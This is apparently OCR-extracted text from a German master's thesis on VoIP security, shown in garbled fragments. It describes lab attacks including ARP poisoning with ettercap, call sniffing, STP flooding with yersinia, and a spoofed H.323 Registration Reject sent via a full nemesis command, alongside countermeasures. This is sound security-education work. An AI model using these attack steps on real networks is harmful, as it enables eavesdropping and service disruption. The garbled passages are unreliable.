374. uation Ablauf und Bedingungen f r Angriff 126 5 4 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 128 5 5 1 RTCP Bye teardown 129 5 5 2 Technik und Funktionsweise 130 5 5 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 130 5 5 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 132 6 Angriffe auf der Netzwerkebene Einf hrung 133 6 1 1 ARP Spoofing 134 6 1 2 Technik und Funktionsweise 135 6 1 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 135 6 1 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 138 6 2 1 Denial of Service MAC Spoofing 139 6 2 2 Technik und Funktionsweise 140 6 2 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 140 6 2 4 MAC Spoofing gegen Port Security 142 6 2 5 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 142 6 3 1 MAC Flooding 143 6 3 2 Technik und Funktionsweise 144 6 3 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 144 6 3 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 145 6 4 1 STP Angriff 146 6 4 2 Technik und Funktionsweise 147 6 4 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 147 6 4 4 DOS STP Flooding Angriff 150 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 8 oo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz
375. uelle Kommunikation auf jedem Netzwerk das Pakete bertr gt erm glichen Es ist zur Zeit in verschiedenen Anwendungen wie zum Beispiel NetMeeting und OpenH323 implementiert Der Hub engl Nabe tech Knotenpunkt bezeichnet in der Telekommunikation Ger te die Netzwerk Knoten physisch sternf rmig verbinden Normalerweise wird die Bezeichnung Hub f r Multiport Repeater gebraucht Sie werden verwendet um Netz Knoten oder auch weitere Hubs z B durch ein Ethernet miteinander zu verbinden InterAsterisk eXchange Abk IAX ist ein Protokoll welches von der OpenSource Telefonanlage Asterisk benutzt wird Es dient dabei sowohl zur Verbindung zwischen einzelnen Asterisk Servern als auch zur Kommunikation zu Endger ten mit denen somit Voice over IP Gespr che m glich sind Aktuell findet die Version 2 IAX2 Verwendung Hiermit kann ein Router oder ein Angreifer eine Meldung an das sendende System schicken und es auf ineffizientes oder ge ndertes Routing aufmerksam machen Dies geschieht indem er den Header des originalen IP Pakets an die ICMP Meldung angeh ngt Damit wei das Sendersystem welche Zieladresse schlecht zu erreichen war und nimmt einen anderen Router Nat rlich enth lt das ICMP Paket auch den Router ber den das Ziel im Idealfall angesprochen werden sollte Ein Intrusion Detection System IDS ist ein System zur Erkennung von Angriffen die an ein Computersystem oder Computernetz gerichtet sind Das IDS kann
376. ufgaben keine Zeit mehr Ein so angegriffener VOP Proxy Server wird folglich keine Verbindungsanfragen mehr seiner User entgegen nehmen k nnen oder im besten Fall mit sehr viel Verz gerung Auch die Weiterleitung der RTP Pakete bestehender Gespr che wird stoppen oder zumindest sehr viel verz gert und verzerrt bei den VOIP Terminals eintreffen Nat rlich ist es auch m glich statt den VOIP Server einzelne Endger te anzugreifen was aber weit weniger effektiv ist als das Herzst ck der Telefonie Infrastruktur Schutz gegen Angriff Analyse Switche mit DoS Detektoren verwenden welche solche Angriffe unterbinden ICMP Echo Requests im Netzwerk sperren nicht auf Broadcast PING antworten und diese im Router schon gar nicht weiterleiten lassen Siehe Massnahmen PING Flood Kapitel 8 5 11 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Siehe Massnahmen IDS Kapitel 8 5 15 Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 153 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 6 6 2 Technik und Funktionsweise Statt eine Liste mit den IP Adressen der Hosts zu f hren an welche ICMP PING Echo Requests gesendet werden sollen kann der Angreifer auch gespoofte ICMP PING Echo Requests an die Broadcast Adresse senden Somit wird jeder angeschlossene und aktive Host im Netzwerk diese Nachricht erhalten und der gespooften Source IP Adresse antworten Ein Angriff via die
377. ufgezeichnet und gleich als WAV File im Systempfad von Cain amp Abel abgelegt Der Tab VOIP enth lt die Eintr ge der gesnifften VOIP Gespr che F r eine interne Gespr chsverbindung werden immer 2 Gespr che aufgezeichnet eine Gespr chsverbindung von User Agent 4129 zu 4111 und eine von 4111 zu 4129 obwohl es sich um ein und dasselbe Gespr ch handelt Zum Abspielen der aufgezeichneten Gespr chsdaten ist mittels rechter Maustaste das gew nschte Gespr ch zu selektieren und dann Play zu w hlen u F EIRENE a File View Configure Tools Help a owm o 28 9mmaE BOCs OF i amp Decoders E Network ES Sniffer d Cracker Ee Traceroute E CCDU a Wireless ES Query Closed IP1 Codec 1P2 Codec 10 1 1 129 3000 PCMU 10 1 1 401 17292 PCM Status File Size 10 1 1 121 3000 PCMU 10 1 1 101 14616 PCM Play Remove Remove A amp vor http www oxid it Es wird automatisch der Standardmusikplayer des Systems ge ffnet und das Gespr ch wiedergegeben Im Gespr ch sind beide Tonspuren 4111 und 4129 h rbar es kann also die Konversation so geh rt werden wie sie auch wirklich stattgefunden hat Windows Media Player Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 117 Berner Fachhochschule Technik und Informatik Software Schule Schweiz 5 2 5 RTP sniffing mit Wireshark Version 1 05 Nach dem
378. uni bremen de prelle terena cookbook Cookbook_D2 figures chapter4 register png Die obigen Informationen betreffend SIP Protokoll sind nicht abschliessend und vollumf nglich aufgef hrt Sie dienen jedoch dem besseren Verst ndnis um die in den n chsten Kapiteln aufgef hrten Angriffe begreifen und selbst nachvollziehen zu k nnen Tiefere und weiterf hrende Informationen ber das SIP Protokoll sind unter folgenden Links erh ltlich http www sip ch http de wikipedia org wiki Session_Initiation_Protocol http www ietefxx64 ch http www ietf org html charters sip charter html Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 31 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 2 2 1 Enumeration SIP User amp Extension en Vertraulichkeit x Eingesetztes Tool Verf gbarkeit zenmap nmap Downloadlink Quelle des Tools Schweregrad 1 leicht 6 schwer http insecure org nmap Hinweise zu Installation Verf gbarkeit Installation Tool 2 Anwendung Tool 2 Zenmap ist die grafische Erweiterung von nmap welches auch in Erforderliche Vorkenntnisse 3 BackTrack3 integriert ist Zenmap ist sowohl f r Windows und Linux erh ltlich Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 2
379. urchgehen der Auflistung sofort festgestellt werden welches zum Beispiel der SIP Proxy Server ist Somit lassen sich gezielt lohnenswerte Ziele f r weitere Angriffe aussuchen Die Enumeration selbst birgt f r das Angriffsziel keine wirklich grosse Gefahr ausser dass in Sachen Vertraulichkeit Informationen ber das Angriffsziel gesammelt werden Jedoch darf diese Angriffsart nicht untersch tzt werden denn sie ist immer als Vorbereitung weiterf hrender Angriffe gedacht Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 34 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 2 2 3 Enumeration SIP User amp Extension ee Vertraulichkeit x Eingesetztes Tool Verf gbarkeit x SIPSCAN Downloadlink Quelle des Tools Schweregrad 1 leicht 6 schwer http www hackingvoip com Hinweise zu Installation Verf gbarkeit Installation Tool 2 Anwendung Tool 3 Das Tool ist unter Windows lauff hig Nach dem Download einfach Erforderliche Vorkenntnisse 3 sipscan exe ausf hren und den Installationsanweisungen folgen SIPSACN ist nicht in BackTrack3 enthalten Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 4 Ziel Angriff Analyse Mittels SIPSCAN werden gezielt SIP Nachrichten wie INVITE REGIS
380. urity 19 02 2009 S Sch r MAS 06 02 20 Seite 62 oo Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz destroying libnet handle deallocating memory for string containing poison user part Number of packets sniffed from target 6 Number of INVITE requests sniffed from target 2 Number of poisoned redirect replies transmitted to target 1 bt KKK Untenstehender Wireshark Trace zeigt folgenden Ablauf Paket 29 User Agent 4129 initiiert Anruf zu User Agent 4119 Paket 30 Angriffstool antwortet mit gespoofter IP Adresse 301 MOVED PERMANENTLY Paket 34 SIP Proxy sendet die original INVITE Nachricht an User Agent 4129 Paket 36 Es wird eine zus tzliche INVITE Nachricht an User Agent 4111 gesendet Paket 37 User Agent 4119 beginnt zu klingeln und quittiert dies Paket 39 User Agent 4111 beginnt auch zu klingeln und quittiert dies ebenfalls WU 129zu4111redirected pcap Wire stark ae Eile Edit View Go Capture Analyze Statistics Help Filter p Expression Clear Apply No Time Source Destination Protocol Info 27 18 901103 CompalIn_Ob ad 96 Broadcast ARP who has 10 1 1 12 Tell 10 1 1 241 28 18 901520 Netopia_21 79 14 Compalin_Ob ad 96 ARP 14 31 19 165675 Dell f0 22 43 Broadcast ARP who has 10 1 1 129 Tell 10 1 1 101 32 19 166326 Aastra_19 93 a7 Dell_f0 22 43 ARP 10 1 1 129 is at 00 08 5d 19 93 a7 40 19 920273 Intelcor_07 f3 50 Broadcast 48 21 000352 Compal n_0
381. ver Asterisk lief weiterhin konnte jedoch wie oben schon beschrieben w hrend den Test Cases aber keine Anfragen mehr der User Agents beantworten Nach dem Durchlauf der Test Cases war Asterisk wieder voll funktionst chtig Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 81 e0 oo Berner Fachhochschule Technik und Informatik Software Schule Schweiz WillVoice PBX MANAGER PRO s ist sdm Hel f ver Jan 4 17 52 29 WARNING 1516 chan sip c 1229 retrans pkt Maximum retries exceeded on transmission 3233 localhost for seqno 1 Cr a itical Response Jan 4 17 52 29 WARNING 1516 chan sip c 3633 process sdp Invalid host in c Line IP4 127 0 0 1 Jan 4 17 52 29 WARHING 1516 chan sip c 1229 retrans pkt Maximum retries exceeded on transmission 3234 localhost for seqno 1 Cri tical Response Jan 4 17 52 29 WAHNINGLI1516 chan sip c 1229 retrans pkt Maximum retries exceeded on transmission 323 localhost for seqno 1 Cr itical Response Jan 4 17 52 29 WARNING 1516 chan sip c 3633 process sdp Invalid host in c line aasasaasa IP4 127 0 0 1 Jan 4 17 52 30 WARNENGLISI6 chan sip c 3633 pracess_sdp Invalid host in c line asaaaaaaaaaaaaaaa IP4 127 0 0 1 Jan 4 17 52 30 WARNING 1516 chan sip c 1229 retrans pkt Maximum retries exceeded on transmission 3236 localhost for seqno 1 Cri tical Response Jan 4 17 52 30 WARMINGLISIIE chan_sip c 3633 process_sdp Invalid host in c line aaaaaaaazaaaaaaaaa
382. views mit dem Experten respektive Betreuer sind in obiger Zeitrechnung nicht ber cksichtigt Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 218 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 4 4 Sitzungen Besprechungen Reviews Ziel Stand des Projektes Teilnehmer Diplomand Betreuer H ufigkeit Alle 2 Wochen Ort Aastra Telecom Schweiz AG Solothurn Dauer 30 Minuten Milestone Reviews Ziel Stand des Projektes Teilnehmer Diplomand Experte H ufigkeit Fix definierte Termine siehe unten vor Erreichen eines Milestones Ort SWS BFH Bern Dauer 30 Minuten Termine fiir Reviews Freitag 21 11 2008 08 30 Uhr Freitag 16 01 2009 08 30 Uhr Montag 02 02 2009 16 30 Uhr Weitere sonstige Termine Mittwoch 20 11 2008 08 30 Uhr 4 5 Milestones Milestones Abgabe Pflichtenheft an Experte elektronisch Best tigung Pflichtenheft durch Experte Upload Pflichtenheft und Eingabe Abstract Abnahme Realisierungskonzept durch Betreuer Angabe Ausstellungsmaterial Diplomplattform Realisierung abgeschlossen Abgabe der fertigen Master Thesis Projektbericht Pr sentation der Master Thesis Pflichtenheft Zwischenbericht Diplomarbeit Diplombericht Schulung Pr sentationstechnik an der BFH Datum 14 11 2008 28 11 2008 08 12 2008 30 01 2009 08 02 2009 19 02 2009 20 02 2009 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 219
383. vom Astreisk Proxy Server den Challenge mit der Aufforderung sich mittels MD5 Hashwert bei ihm zu authentifizieren Trace pcap Wireshark File Edit View Go Capture Analyze Statistics Help Filter Time Source Destination Protocol Info 31 9 626313 Netopia_21 79 14 Compal n_0b ad 96 ARP 10 1 1 1 is at 00 0f cc 21 79 14 32 12 516510 Intelcor_07 f3 50 Broadcast ARP who has 10 1 1 71 Tell 10 1 1 151 EERE ELIE a i a Ta pek IAX source call 4555 timestamp 3ms REGREQ No who has 10 1 1 151 Tell 10 1 1 111 35 13 494389 vmware_55 dd b4 Broadcast 10 1 1 151 is at 00 1c c0 07 f3 50 36 13 494540 Intelcor_07 f3 50 vmwar e_55 dd b4 Mit Paket Nr 37 wird die gespoofte Antwort des Angreifers an 4131 gesendet und ihm mitteilt das nur Klartext als Authentifizierungs Methode in Frage kommt Information Element Authentication method s 0x0001 Mit Paket Nr 38 antwortet der IAX Client 4131 dem Asterisk Proxy Server und sendet ihm den aus Passwort und Challenge gebildeten MD5 Hashwert zur Registrierung zu Trace pcap Wireshark File Edit View Go Capture Analyze Statistics Help Filter l i Oo Expression Clear Apply Time Source Destination Protocol Info 36 13 494540 ARP bytes on wire 64 bytes Ethernet II Src vmware_55 dd b4 00 0c 29 55 dd b4 Dst Intelcor_07 f3 50 00 1c c0 07 f3 50 Internet Protocol Src 10 1 1 101 10 1 1 101 Dst 10 1 1 151 10 1 1 151
384. ward Delay sec 15 Error Topology Changes 23 z support Time Since Topology Change 336 Help Hold Time sec 1 6 4 4 DOS STP Flooding Angriff Eine weitere Variante von einem STP Angriff wird untenstehend aufgezeigt Mittels des Tools Yersinia kann ein sehr potentieller Angriff gestartet werden Bei diesem Angriff werden eine Vielzahl von BPDU Nachrichten ins Netzwerk gesendet Die empfangenden Switche m ssen f r jedes erhaltene BPDU die Pfadkosten und somit den Spanning Tree neu berechnen W hrend dieser Zeit k nnen keine Nutzdaten zwischen den Switchen ber die Pfade transportiert werden Fr her dauerte die Neuberechnung der Pfade 30 Sekunden und mehr Nicht zuletzt deswegen wurde 2003 das Protokoll RSTP Rapid Spanning Tree IEEE 802 1w ins Leben gerufen bei dem die Neuberechnung des ganzen Spanning Trees unter 1 Sekunde liegt Trotzdem hat der Angriff eine sehr gute Wirkungskraft denn Yersinia schafft es 25000 gef lschte BPDU Pakete pro Sekunde ins Netzwerk zu senden Im Terminalfenster wird yersinia von BackTrack 3 aus gestartet Danach wird der Angriff mit folgenden Argumenten aus yersinia heraus gestartet yersinia stp attack 2 Untenstehender Wireshark Trace zeigt die gef lschten BPDU Pakete die Yersinia w hrend des Angriffes ins Netzwerk sendet File Edit View Go Capture Analyze Statistics Help Eilter Expression Clear Apply Source Destination Protocol Info Frame 45061
385. weitere Angriffe t tigen Die Absicherung mittels VLAN und einer zus tzlichen Schutzmassnahme wie Authentisierung nach 802 1x siehe Kapitel 8 5 18 statische MAC Tabelleneintr ge siehe 8 5 2 oder VLAN Zugriffslisten bieten jedoch einen recht umfassenden Schutz Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 193 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz 8 5 15 IDS Ein IDS Intrusion Detection System tiberwacht automatisch im Netzwerk Systeme oder das Netzwerk selber Dabei kann es sich um eine Hardware oder softwarebasierte L sung handeln IDS Systeme erkennen Angriffsversuche die sonst unerkannt bleiben w rden Dabei stellt das IDS Unregelm ssigkeiten beim betroffenen Angriffsziel fest welche im normalen Betriebs Status nicht vorkommen Zum Beispiel wird eine sehr grosse Menge gesendeter Pakete mit gleicher Absenderadresse oder spezielle String Folgen als m glicher Beginn eines Angriffes gewertet und Alarm geschlagen Daher arbeitet ein IDS gem ss Prozessmodell in drei Funktionsbl cken Informationsbeschaffung Das IDS muss zuerst kennen lernen wie der normale Betriebsstatus aussieht Analyse Im laufenden Betrieb sammelt das IDS sehr viele Informationen Diese werden analysiert Die Hauptmethoden dabei sind Misuse Detection und Anomaly Detection Minuse detektiert bekannte Sicherheitsangriffe Anomaly Unterschiede gegen ber dem normalen Betriebs Status Re
386. weiz Zur Kontrolle k nnen im Tab Targets noch einmal die gew nschten Angriffsziele angesehen werden ettercap NG 0O 7 3 Start Targets Hosts View Mitm Filters Logging Plugins Help Host List x Target 1 Target 2 10 1 1 129 10 1 1 101 53 ports monitored 7587 mac vendor fingerprint 1698 tcp OS fingerprint 2183 known services Randomizing 65535 hosts for scanning f Scanning the whole netmask for 65535 hosts 10 hosts added to the hosts list Host 10 1 1 129 added to TARGET1 Host 10 1 1 101 added to TARGET2 Damit an die beiden Angriffsziele die manipulierten ARP Nachrichten gesendet werden wird die Man in the middle Mitm Attacke ARP poisoning wie folgt gestartet gt gt Mitm gt gt keine der beiden Auswahlboxen selektieren gt gt OK Start Targets Hosts View Mitm Filters Logging Plugins Help Host List x Targets x Target 1 2633 3229 53 ports monitored 7587 mac vendor fingerprint 1698 tcp OS fingerprint 2183 known services Randomizing 65535 hosts for scanning Scanning the whole netmask for 65535 hosts 10 hosts added to the hosts list Host 10 1 1 129 added to TARGETI Host 10 1 1 101 added to TARGET2 lt P OK X Cancel Mittels Start gt gt Start sniffing wird die Sniffer Funktion gestartet welche die empfangenen Daten dieser zwei Angriffsziele ins vordefinierte Logfile logfileARPPoisoning pcap schreibt ett
387. x 2 lolx File Sniff Options tee pb lol x Q Network interface Microsoft MAC Bridge Virtual NIC Dox X cree In Plugins ist der stp_mangler zu selektieren Ab diesem Zeitpunkt werden ber die zuvor gew hlte Netzwerkbr cke die gef lschten BPDU Pakete ins Netzwerk gesendet welche die Switche im Netzwerk dazu veranlassen die Pfade von Spanning Tree neu zu berechnen und redundante Wege auf inaktiv zu setzen Infolge der gespooften sehr tiefen Pfadkosten des Angreifers wird dann der Pfad ber den PC des Angreifers gew hlt E ettercap NG 0 7 3 lol x Start Targets Hosts View Mitm Filters Logging Plugins Pluains gt item fs O O PPEp_ lt lear 0 PPTP Tries to Force cleartext tunnel pptp_pap pptp_reneg rand_flood remote_browser reply_arp scan_poisoner PPTP Forces PAP authentication PPTP Forces tunnel re negotiation Flood the LAN with random MAC addresses Sends visited URLs to the browser Simple arp responder Actively search other poisoners search_promisc Search promisc NICs in the LAN smb_clear smb_down stp_mangler Tries to Force SMB cleartext auth Tries to force SMB to not use NTLMZ key auth Become root of a switches spanning tree Pee ee ee a a OOONOONnNnOooOo ports monitored 587 mac vendor Fingerprint 1698 tcp OS Fingerprint ctivating stp_mangler plugin tp_mangler Start sending Fake STP packets activating stp_mangler plugin tp_mangler
388. x00 IP Frag offset 0x0000 IP Frag flags UDP Ports 3000 gt 3000 Wrote 50 byte UDP packet through linktype DLT_EN10MB UDP Packet Injected In Paket Nr 2897 wird die RTCP BYE Nachricht an User Agent 4129 gesendet Doch leider bleibt auch dieser Angriff ohne Erfolg Die Verbindung zwischen User Agent 4111 und 4129 bleibt bestehen und die RTCP BYE Nachricht des Angreifers bleibt ignoriert Der zeitliche Rahmen dieser Diplomarbeit liess es leider nicht mehr zu die Ursache des Ignorierens dieser RTCP BYE Pakete zu ergriinden trace 2897 ist user bye pcap Wireshark ioe File Edit View Go Capture Analyze Statistics Help Filter v Expression Clear Apply No Time Source Destination Protocol Info Zu Destin Destination p estinat DIS source port port rt ort 6 1 Source Sour 2897 15 854522 859 UDP ition p mm 9 Ethernet II Src Dell_f0 22 43 00 14 22 f0 22 43 Dst Aastra_19 93 a7 00 08 5d 19 93 a7 3 Internet Protocol Src 10 1 1 101 10 1 1 101 Dst 10 1 1 129 10 1 1 129 version 4 Header length 20 bytes Differentiated Services Field 0x00 DSCP 0x00 Default ECN 0x00 Total Length 36 Identification Oxce94 52884 9 Flags 0x00 5 5 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Hat ein Angreifer die M glichkeit den Netzwerkverkehr aufzuzeichnen so ist er auch in der Lage ges
389. yse Mit IP Spoofing t uscht der Angreifer eine falsche Identit t vor Somit kann er unberechtigt trotzdem Zugriff zu Netzwerken und VOIP Servern erhalten Oftmals ist der Zugang zu diesen Infrastrukturen mittels Firewall oder Paketfiltern gesichert so dass nur User mit bestimmter IP Adresse Zugang zu diesen Elementen haben Sehr oft werden auch die Managementzug nge der Router Switch Gateways oder VOIP Server so gesichert dass nur eine einzige IP Adresse Administrator berechtigt ist via remonte auf diese Komponente zuzugreifen Hat der Angreifer Zugang zum angegriffenen Netzwerk oder zur Netzwerkkomponente erlangt kann er im ungesch tzten Bereich seine Angriffe ungehindert weiterf hren Schutz gegen Angriff Analyse Siehe Massnahmen IP Spoofing Kapitel 8 5 7 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 156 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 6 7 2 Technik und Funktionsweise Im Header eines jedes IP Paketes ist die Source IP Adresse enthalten Somit kann festgestellt werden von wem das IP Paket gesendet worden war Dieser Header l sst sich jedoch mit einfachem Aufwand f lschen so dass eine andere Source IP Adresse vorget uscht werden kann Sicherheitsmassnahmen wie eine Authentifizierung welche lediglich darauf beruht die Source IP Adresse zu pr fen werden somit problemlo
390. zifiziert In der IP Telefonie ist das SIP ein haufig angewandtes http de wikipedia org wiki Session Protokoll _Initiation_Protocol SIPCrack ist ein Open Source Login Password Cracker f r das SIP Protokoll Das Programm besteht aus den Werkzeugen SIPDump mit welchem entsprechende SIPLogindaten vom Netzwerkinterface oder aus einem capture file erschn ffelt werden k nnen und dem eigentlichen SIPCrack mit dem die mit SIPDump http oneunity ronnysackmann de i erschn ffelten Logindaten geknackt werden ndex php site voip_siptools php SIPS funktioniert so hnlich wie HTTPS Es handelt sich um die Verschl sselung von SIP mit TLS SSL Beim Aufruf wird eine verschl sselte Verbindung aufgebaut Die Verbindung zwischen Telefon und Proxy wird verschl sselt und kann immer noch abgeh rt werden Die Daten k nnen jedoch nicht mehr eingesehen werden Bei den Server und Proxy Herstellern ist SIPS sehr h ufig http www elektronik implementiert Bei den Telefon Herstellern und SIP kompendium de sites net 1106061 Providern ist es dagegen weniger verbreitet htm Mit sip scan k nnen IP Bereiche schnell nach VoIP Ger ten gescannt werden Dazu wird der OPTIONS Request des SIP Protokolls verwendet Zum aufz hlen von IPs wird die Klasse IP_iterator verwendet http skora net voip attacks SiVuS ist ein Schwachstellenscanner f r VoIP Netze und Ger te Neben einem Scanner zum Finden von VoIP f higen Ger ten bietet er verschie
391. zu registrieren Der Angreifer jedoch hat die M glichkeit mittels einem Script die Registration Nachricht immer wieder in kurzen Zeitabst nden zu wiederholen Somit bleibt das Angriffsziel h chstens immer nur f r eine kurze Zeit registriert 4 4 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer sendet dem Endpoint 4151 mit der IP Adresse 10 1 1 151 eine gespoofte Registration Reject Nachricht Damit der Angreifer in Kenntnis der MAC Adresse des Angriffszieles kommt muss die Bedingung gegeben sein in einem geswitchten Netzwerk Daten abhorchen zu k nnen Siehe Kapitel 1 4 Eine andere Variante um an die MAC Adresse des Angriffszieles zu kommen ist die Enumeration wie sie in Kapitel 2 2 1 angewendet wurde Im Terminalfenster von BackTrack3 wird nemesis gestartet Nemesis wird dazu verwendet um ein g ltiges Registration Reject Paket im Zusammenhang mit dem vordefinierten IP Paket iSEC Registration Reject erstellen Der Angriff wird mit folgenden Argumenten aus nemesis heraus gestartet nemesis udp 1719 y 2171 S 10 1 1 241 D 10 1 1 151 H 00 1E EC OB AD 96 M 00 1c c0 07 3 50 P 1SEC registration Reject DOS v Die Werte im Einzelnen stehen wie folgt f r nemesis udp Startet nemesis mudus UDP x 1719 ber welches Port die Meldung abgesetzt werden soll y 2117 An welches Port die Meldung gesendet werden soll ersnifft mit Portscanner S IP Adresse des zu spoofenden Endpoints Servers D A
Download Pdf Manuals
Related Search